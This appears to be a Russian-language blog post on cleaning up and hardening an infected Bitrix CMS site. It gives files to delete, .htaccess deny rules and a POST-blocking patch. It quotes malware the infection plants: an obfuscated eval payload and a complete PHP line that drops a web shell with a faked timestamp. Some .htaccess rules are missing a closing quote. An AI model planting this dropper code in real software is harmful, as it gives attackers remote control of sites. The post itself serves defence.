Столкнулся с проблемой. При обновлении битрикс перестал на сайте открываться сайт, полез в админку аналогичная ситуация.
По ftp заходит, попробовал поставить стандартный .htaaccess не проканал. Начал рыть, ситуация оказалась такая, сайт оказался зараженным.
Решение такое:
1. Если не открывается фронт, то идём /bitrix/modules/main/include/prolog.php
Обычно это последняя строка начинающаяся /n в этом скрипте ещё указывается путь к какому либо файлу
2. Если не открывается админка, то
bitrix/js/main/core/core.js
Действия аналогичные первому пункту
Немного покопавшись по папкам и форумам, находим такую информацию, что вирус создает файлы, с виду нужные, но оказывается что их изначально у не зараженных сайтов нет:
- /bitrix/components/bitrix/main.file.input/main.php - удаляем.
- /bitrix/components/bitrix/main.file.input/set_list.php - тоже удаляем, но его может и не быть.
Чистим весь кеш и наблюдаем за результатом.
____
Скорее всего это будет иметь временный эффект, так как причина не устранена, на всякий случай ниже прикрепляю выдержку из статьи другого блога, надеюсь не пригодиться.) Ставьте палец вверх, чтобы больше людей нашло, то что они ищут.
____
Так же покопавшись по форумам, есть еще вирусы более подлые.
- заменяют index.php в корне сайта,
- удаляют файл /bitrix/.settings.php,
- создают скрипты Агенты с вредоносным кодом, создаются подобные агенты:
- $arAgent["NAME"];eval(urldecode(strrev('b3%92%92%22%73%b6%34%a5%b6%76%34%26%86%a5%85%a5%73%b6%96%....
- $fName = str_replace('/modules/main/classes/mysql', '', dirname(__FILE__)).'/admin/composite_seminarians.php'; $files = scandir(dirname($fName)); file_put_contents($fName, '<?php V47dc049a84b(@$_POST[\'c3a1e58\']); function V47dc049a84b($I018d087c){ @eval($I018d087c); } ?> '); touch($fName, filemtime(dirname($fName).'/'.$files[2]));
- создают файл /bitrix/tools/putin_***lo.php с кодом для удаленного доступа
- удаляют данные из таблиц базы данных b_iblock, b_iblock_element, b_iblock_element_property
Для предотвращения заражения дальше, стоит выполнить немного действий.
- Перевести работу сайта на актуальную версию php 7.4 (если это еще не сделано)
- Обновить Битрикс до актуальной версии (Не всегда это помогает)
- Если на сайте есть модуль "Проактивная защита" /bitrix/admin/security_panel.php - выполнить настройки по рекомендациям модуля
- Проверить сайт инструментом Битрикс "Сканер безопасности" /bitrix/admin/security_scanner.php
- Закрыть доступ к файлам на уровне сервера, временно (например в .htaccess)
- /bitrix/tools/upload.php
- /bitrix/tools/mail_entry.php
- /bitrix/modules/main/include/virtual_file_system.php
- /bitrix/components/bitrix/sender.mail.editor/ajax.php
- /bitrix/tools/vote/uf.php
- /bitrix/tools/html_editor_action.php
- /bitrix/admin/site_checker.php
Пример как можно ограничить доступы:
/home/bitrix/www/bitrix/admin/.htaccess
Добавляем в файле правило. Если файла нет - создаем.
<Files ~ "^(site_checker)\.php$>deny from all</Files>
/home/bitrix/www/bitrix/tools/.htaccess
Добавляем в файле правило. Если файла нет - создаем.
<Files ~ "^(html_editor_action|mail_entry|upload)\.php$> deny from all</Files>
/home/bitrix/www/bitrix/modules/main/include/.htaccess
Добавляем в файле правило. Если файла нет - создаем.
<Files ~ "^(virtual_file_system)\.php$> deny from all</Files>
/home/bitrix/www/bitrix/components/bitrix/sender.mail.editor/.htaccess
Добавляем в файле правило. Если файла нет - создаем.
<Files ~ "^(ajax)\.php$> deny from all</Files>
/bitrix/tools/vote/.htaccess
<Files ~ "^(uf)\.php$> deny from all</Files>
В старых версиях битрикс уязвимым местом оказался модуль vote , это модуль опросник. Для того что бы обезопасить себя, в файле:
/bitrix/tools/vote/uf.php над вызовом модуля вписываем:
if ($_SERVER['REQUEST_METHOD'] === 'POST')
{
header("Status: 404 Not Found");
die();
}
Тоже самое и в файле /bitrix/tools/html_editor_action.php
На данную минуту все. Если что, пишите...
